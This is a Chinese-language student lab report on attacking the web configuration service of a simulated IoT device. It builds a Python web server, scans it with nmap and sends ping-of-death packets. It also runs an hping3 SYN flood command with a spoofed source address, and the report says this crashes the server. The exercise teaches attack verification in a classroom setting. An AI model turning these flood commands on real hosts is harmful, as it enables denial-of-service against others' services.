正文
一 實驗目的及要求
物聯網智能設備一般都提供WiFi接入,本實驗是在WiFi密碼破解基礎上進一步對物聯網智能設備配置服務開展安全性分析實驗。比如智能物聯網家居網關、智能家居中的智能插座等,一般都內置Web服務,方便本地登錄Web網頁開展參數設置。本實驗旨在完成物聯網智能設備的配置服務的基本安全分析和攻擊驗證。
二 實驗要求
(1)實驗要求掌握Web服務器的基本原理。
(2)掌握TCP SYN Flood的原理並實施驗證,可選擇network攻擊軟件。
(3)掌握nmap端口掃描工具的應用。
(4)開展死亡之ping實驗驗證。
(4)學會用Python或Node.js快速構建簡單Web服務。
三 實驗基本步驟
提示:在筆記本電腦構建WiFi熱點,模擬物聯網智能設備的服務,兩個同學構成一個實驗小組,小組內相互設置服務,改變IP和端口,開展安全分析和工具。注意在筆記本電腦上構建時用管理員權限運行netsh wlan set hostednetwork mode=allow ssid=wkk key=87654321。用Python或Node.js快速構建簡單Web服務。
1、 構建一個小型局域網,使兩臺主機在同一網段。
2、搭建服務器
3、Nmap掃描端口
4、死亡之ping
5、TCP SYN FLOOD攻擊
四 實驗過程及有關程序代碼
目標主機 10.3.248.120,攻擊主機10.3.39.27
1、構建一個小型局域網,使兩臺主機在同一網段。打開手機WIFI熱點,兩臺主機都連接。
2、 在一臺主機開啓一個web服務,作爲一個服務器。
使用python搭建的,首先在python的安裝目錄下,新建一個文件夾
webserver,打開一個cmd,輸入命令python –m SimpleHTTPServer 8888,開啓一個web服務器,8888端口
測試,創建一個index.html
3、 nmap掃描端口
另一臺主機nmap 10.3.248.120 –sT掃描
8888端口是開放的。
4、死亡之ping
攻擊機輸入攻擊命令,ping –l 65500 10.3.248.120
目標主機收到大量ICMP包
此時,訪問目標網站,會無法訪問或者出現很大的延遲。
5、 TCP SYN FLOOD
利用kali下的hping3工具,攻擊主機輸入命令hping3 -q -n -a 10.3.39.27 -S -s 53 --keep -p 8888 --flood 10.3.248.120
目標主機收到大量的SYN握手包,此時web服務器再次崩潰,甚至web服務都無法停止,停止攻擊之後,一段時間之後纔可以停止。